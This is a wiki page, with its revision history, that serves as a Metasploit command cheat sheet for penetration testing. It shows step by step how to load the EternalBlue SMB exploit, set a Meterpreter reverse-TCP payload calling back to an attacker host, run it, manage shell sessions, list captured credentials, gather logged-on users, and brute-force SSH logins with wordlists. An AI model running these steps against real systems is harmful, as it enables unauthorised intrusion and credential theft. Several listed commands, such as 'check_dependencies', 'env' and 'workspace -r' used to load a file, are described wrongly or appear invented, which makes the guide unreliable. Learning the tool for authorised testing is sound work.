Admin: Text replacement - "Category:Wiki" to "Category:Wiki '''''[https://it-arts.net/index.php/Category:Wiki Return to Wiki Index]''''' "

2026-01-17T07:13:21Z

Text replacement - "Category:Wiki" to "Category:Wiki '''''[https://it-arts.net/index.php/Category:Wiki Return to Wiki Index]''''' "

← Older revision		Revision as of 07:13, 17 January 2026
Line 1:		Line 1:
	[[Category:Wiki]]		[[Category:Wiki]]

			'''''[https://it-arts.net/index.php/Category:Wiki Return to Wiki Index]'''''


	== Starting Metasploit Console ==		== Starting Metasploit Console ==

Admin at 16:35, 13 December 2025

2025-12-13T16:35:34Z

Show changes

Admin at 16:33, 13 December 2025

2025-12-13T16:33:33Z

Show changes

Admin: Created page with "Category:Wiki == Advanced Metasploit CLI Commands == === Starting Metasploit Console === To start the Metasploit Framework console, use the following command: msfconsole This launches the Metasploit interactive console, where you can execute various commands for penetration testing. === Search for Exploits === To search for a specific exploit module or vulnerability in Metasploit: search For example, to searc..."

2025-12-13T16:32:51Z

Created page with "Category:Wiki == Advanced Metasploit CLI Commands == === Starting Metasploit Console === To start the Metasploit Framework console, use the following command: <nowiki> msfconsole </nowiki> This launches the Metasploit interactive console, where you can execute various commands for penetration testing. === Search for Exploits === To search for a specific exploit module or vulnerability in Metasploit: <nowiki> search <search_term> </nowiki> For example, to searc..."

New page

[[Category:Wiki]]

== Advanced Metasploit CLI Commands ==

=== Starting Metasploit Console ===
To start the Metasploit Framework console, use the following command:

<nowiki>
msfconsole
</nowiki>

This launches the Metasploit interactive console, where you can execute various commands for penetration testing.

=== Search for Exploits ===
To search for a specific exploit module or vulnerability in Metasploit:

<nowiki>
search <search_term>
</nowiki>

For example, to search for exploits related to "Windows SMB":

<nowiki>
search smb windows
</nowiki>

This will list all relevant exploits, auxiliary modules, and payloads.

=== Show Available Modules ===
To list all available Metasploit modules, use:

<nowiki>
show modules
</nowiki>

This command lists all types of modules, including exploits, auxiliary, post-exploitation, and payloads.

=== Use an Exploit Module ===
To use an exploit module:

<nowiki>
use <module_path>
</nowiki>

For example, to use an SMB exploit:

<nowiki>
use exploit/windows/smb/ms17_010_eternalblue
</nowiki>

This sets the module for use in the current session.

=== Show Module Options ===
To view the options available for a specific module:

<nowiki>
show options
</nowiki>

This displays required and optional parameters for the current module.

=== Set Module Options ===
To set the required parameters for an exploit, such as the target IP address:

<nowiki>
set RHOST <target_ip>
</nowiki>

Replace `<target_ip>` with the actual target machine's IP address. You can set other options in a similar way.

=== Show Payloads ===
To list all available payloads for a specific exploit:

<nowiki>
show payloads
</nowiki>

This will show the payloads compatible with the currently selected exploit.

=== Select and Set Payload ===
To select and configure a payload:

<nowiki>
set PAYLOAD <payload_name>
</nowiki>

For example, to set a reverse TCP payload:

<nowiki>
set PAYLOAD windows/meterpreter/reverse_tcp
</nowiki>

You can then set specific options for the payload, like the LHOST (local host IP):

<nowiki>
set LHOST <local_ip>
</nowiki>

### Example:

<nowiki>
set LHOST 192.168.1.100
</nowiki>

=== Running the Exploit ===
Once the module and payload are set, you can run the exploit:

<nowiki>
exploit
</nowiki>

This will execute the exploit and attempt to gain access to the target machine.

=== Running the Exploit in Background ===
If you want to run the exploit in the background without blocking the terminal:

<nowiki>
exploit -j
</nowiki>

The `-j` flag runs the exploit as a background job.

=== Show Sessions ===
To view active sessions after exploiting a target:

<nowiki>
sessions
</nowiki>

This command shows a list of all active sessions (Meterpreter or shell sessions).

=== Interact with a Session ===
To interact with a specific session:

<nowiki>
sessions -i <session_id>
</nowiki>

For example, to interact with session 1:

<nowiki>
sessions -i 1
</nowiki>

This gives you a shell or Meterpreter prompt for that session.

=== Background a Session ===
To background a session and return to the main Metasploit console:

<nowiki>
background
</nowiki>

This command puts the current session in the background, allowing you to continue working on other tasks in the console.

=== Session Cleanup ===
To terminate a specific session:

<nowiki>
sessions -k <session_id>
</nowiki>

For example:

<nowiki>
sessions -k 1
</nowiki>

This closes session 1.

=== Exploit Vulnerability Verification ===
To verify if a specific vulnerability exists on the target machine, use the following command:

<nowiki>
check
</nowiki>

This will run basic checks to determine if the target is vulnerable to the selected exploit.

=== List Credentials ===
If you have gained access to the target system and want to list available credentials:

<nowiki>
creds
</nowiki>

This command shows all credentials (e.g., username and password pairs) captured during the session.

=== Save Your Progress ===
To save the current state of your Metasploit session (including all modules, options, and sessions):

<nowiki>
save
</nowiki>

This will save your current Metasploit environment to the default location.

=== Load a Saved Workspace ===
To load a saved Metasploit workspace:

<nowiki>
workspace -r <workspace_file>
</nowiki>

This will restore your saved workspace, including all settings, modules, and sessions.

=== Managing Workspaces ===
To list all available workspaces:

<nowiki>
workspace
</nowiki>

To create a new workspace:

<nowiki>
workspace -a <workspace_name>
</nowiki>

To switch between workspaces:

<nowiki>
workspace <workspace_name>
</nowiki>

### Example:

<nowiki>
workspace my_new_workspace
</nowiki>

=== Running Auxiliary Modules ===
To use an auxiliary module (e.g., a scanner):

<nowiki>
use auxiliary/scanner/portscan/tcp
</nowiki>

You can then set the target and run the module just like with an exploit.

=== Start a Post-Exploitation Module ===
Once you have access to a system, you can use post-exploitation modules. For example, to use a module that collects information about the target:

<nowiki>
use post/windows/gather/enum_logged_on_users
</nowiki>

This collects information about logged-on users on the Windows target.

=== Show Help for Commands ===
To get help for a specific command or module, use:

<nowiki>
help <command>
</nowiki>

For example, to get help on the `sessions` command:

<nowiki>
help sessions
</nowiki>

This will display detailed usage instructions and options for the command.

=== Advanced Search for Exploits ===
You can use advanced search queries to filter modules by specific parameters:

<nowiki>
search type:exploit platform:windows name:ms17_010
</nowiki>

This command searches for exploits related to the MS17-010 vulnerability on Windows platforms.

=== Check for Dependencies ===
To check if a module has any missing dependencies before use:

<nowiki>
check_dependencies
</nowiki>

This command will list any missing libraries or files needed to run a module.

=== Perform a Dictionary Attack ===
To use a dictionary attack against an SSH service, for example:

<nowiki>
use auxiliary/scanner/ssh/ssh_login
set RHOSTS <target_ip>
set USER_FILE /path/to/usernames.txt
set PASS_FILE /path/to/passwords.txt
run
</nowiki>

This runs an SSH login brute-force attack using the specified username and password lists.

=== Display Environment Variables ===
To display the current environment variables in Metasploit:

<nowiki>
env
</nowiki>

This will show details about the current environment, including system and framework-specific variables.

=== Exit Metasploit Console ===
To exit the Metasploit console:

<nowiki>
exit
</nowiki>

This command will close the Metasploit Framework console and return to the command-line prompt.

METASPLOIT - Base Commands - Revision history

Admin: Text replacement - "Category:Wiki" to "Category:Wiki '''''[https://it-arts.net/index.php/Category:Wiki Return to Wiki Index]''''' "

Admin at 16:35, 13 December 2025

Admin at 16:33, 13 December 2025